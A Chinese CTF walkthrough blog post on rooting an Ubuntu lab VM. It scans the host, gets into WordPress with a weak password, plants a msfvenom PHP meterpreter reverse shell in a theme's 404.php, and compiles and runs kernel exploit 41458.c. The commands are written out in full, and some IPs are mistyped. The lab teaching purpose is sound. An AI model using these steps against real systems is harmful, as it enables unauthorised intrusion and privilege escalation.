CTF入门之ubuntu内核提权拿下root权限

admin 2023年5月15日11:00:50评论72 views字数 2000阅读6分40秒阅读模式

欢迎回来,我的新手黑客

今天给大家带来的是关于CTF方面的简单的内核提权,这是一个关于系统级的漏洞,如果可以发现这种漏洞,将有助于我们更快的进行主机渗透,所以我还是选择用文字的方式将其记录下来,在撰写该文章的时候,自己也复习了一遍




环境搭建:下载对应的镜像,使Kali和靶机处于同一个网段,即可以ping通

镜像下载地址:

https://pan.baidu.com/s/1eb3jFN8nHoq6MElBGRy9CQ

提取码:qhp8




Step1:每当遇到一个新的实验环境,第一步进行的几乎都是内网扫描,探测存活主机以及主机运行的服务

nmap -Pn -T4 192.168.83.0/24

CTF入门之ubuntu内核提权拿下root权限

根据输出信息找到我们的目标主机,该主机IP地址为192.168.83.136,开放的端口有21,22,80

接下来我们针对该主机进行更为细致的探测

nmap -sV 192.168.83.136

CTF入门之ubuntu内核提权拿下root权限

从输出中我们能更为细致的知道每个服务的详细信息,FTP服务可能存在后门我们可以用之前讲到过的工具进行探测,SSH服务可能存在私钥泄露,今天我们主要针对http服务进行探测




Step2:针对http服务进行探测,我们先用浏览器打开网页,通过F12看看能不能发现什么


CTF入门之ubuntu内核提权拿下root权限

从源代码上看,就是一张GIF图片,并没有什么发现,这个时候尝试对网站后台进行扫描

dirb http://192.168.83.136/

CTF入门之ubuntu内核提权拿下root权限

在扫描过程中我们发现一个有意思的输出信息,竟然还有一个站点,我们可以确定是一个wordpress的站点,先打开看看

CTF入门之ubuntu内核提权拿下root权限

还是没有什么突破,但是我们知道了这个站点是通过wordpress建站的,这个我们想到了一个工具,看看能不能找到可以直接利用的漏洞

wpscan --url http://192.68.83.136/wordpress --enumerate at --enumerate ap --enumerate u

其中的--enumerate代表枚举,at代表可用的主题,ap代表可用的插件,u代表用户名

CTF入门之ubuntu内核提权拿下root权限

我们看到枚举出了两个用户,那这个时候我们猜想会不会用户使用弱口令进行登录呢?我们尝试一下以账号密码都为admin登录

从之前对网站的扫描结果中找到URL,尝试登陆

CTF入门之ubuntu内核提权拿下root权限

很幸运,我们使用弱口令登陆管理后台,这个时候我们就想起了前一篇文章里面的wordpress站点拿shell




Step3:接下来我们先拿下服务器的权限,使用上一篇SMB服务信息泄露渗透主机讲过拿webshell方法

1-->首先使用msfvenom生成可以以返回TCP连接的PHP代码
msfvenom -p php/meterpreter/reverse_tcp LHOST=192168.43.134 LPORT=4444 -f raw
其中-p参数指定负载类型,因为是生成PHP代码,所以负载指定为php/meterpreter/reverse_tcp;LHOST指定返回TCP时需要连接的IP地址,即攻击机本身的IP地址,LPORT指定返回TCP连接时连接的端口

CTF入门之ubuntu内核提权拿下root权限

2-->接下来我们复制生成的有效载荷,从Payload size下一行开始复制,注意不要复制/*

点击左侧的Appearance->Editor

CTF入门之ubuntu内核提权拿下root权限

3-->点击完选择右侧的主题,并点击404.php页面进行编辑,完成编辑并更新文件

CTF入门之ubuntu内核提权拿下root权限

接下来开启监听,并访问刚才编辑的页面准备接收返回的TCP连接
use exploit/multi/handlerset payload php/meterpreter/reverse_tcpset LHOST 192.168.83.134set LPORT 4444exploit

CTF入门之ubuntu内核提权拿下root权限

CTF入门之ubuntu内核提权拿下root权限

在回到终端,我们发现已经获取返回的TCP连接

CTF入门之ubuntu内核提权拿下root权限

接下来我们查看返回TCP连接的用户,发现用户是www-root,并不具备root权限

CTF入门之ubuntu内核提权拿下root权限

接下来我们再来查看一下系统信息

CTF入门之ubuntu内核提权拿下root权限

发现系统的内核是ubuntu4.4.0,这个时候我们通过工具去查看一下有没有相对应的漏洞信息

CTF入门之ubuntu内核提权拿下root权限

我们发现有一个系统本地提权漏洞信息,我们通过后面的Path路径找到漏洞利用文件

CTF入门之ubuntu内核提权拿下root权限

找到该文件之后,至于代码的内容是什么我们可以先不用去浏览,我们需要将该C语言源代码编译
gcc 41458.c -o root

CTF入门之ubuntu内核提权拿下root权限

编译成功之后,准备进行内核提权



Step4:回到刚才获取到的会话,上传该文件至服务器,并运行进行内核提权

CTF入门之ubuntu内核提权拿下root权限

成功上传,文件名为root
接下来进入shell,并运行该文件

CTF入门之ubuntu内核提权拿下root权限

权限不够,先退出shell会话,我们来看一下该文件的权限信息

CTF入门之ubuntu内核提权拿下root权限

我们发现是该文件没有运行权限,只有用户该文件有运行权限才可以运行,我们修改该文件的权限,再次尝试运行
chmod 777 rootshell./root

CTF入门之ubuntu内核提权拿下root权限

这个时候我们看到成功提权为root权限,接下来进入root家目录查看flag


如果你喜欢我写的文章,点一下右下角的“在看”,谢谢你啦




原文始发于微信公众号(Kali渗透测试教程):CTF入门之ubuntu内核提权拿下root权限

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月15日11:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CTF入门之ubuntu内核提权拿下root权限http://cn-sec.com/archives/971997.html

发表评论

匿名网友 填写信息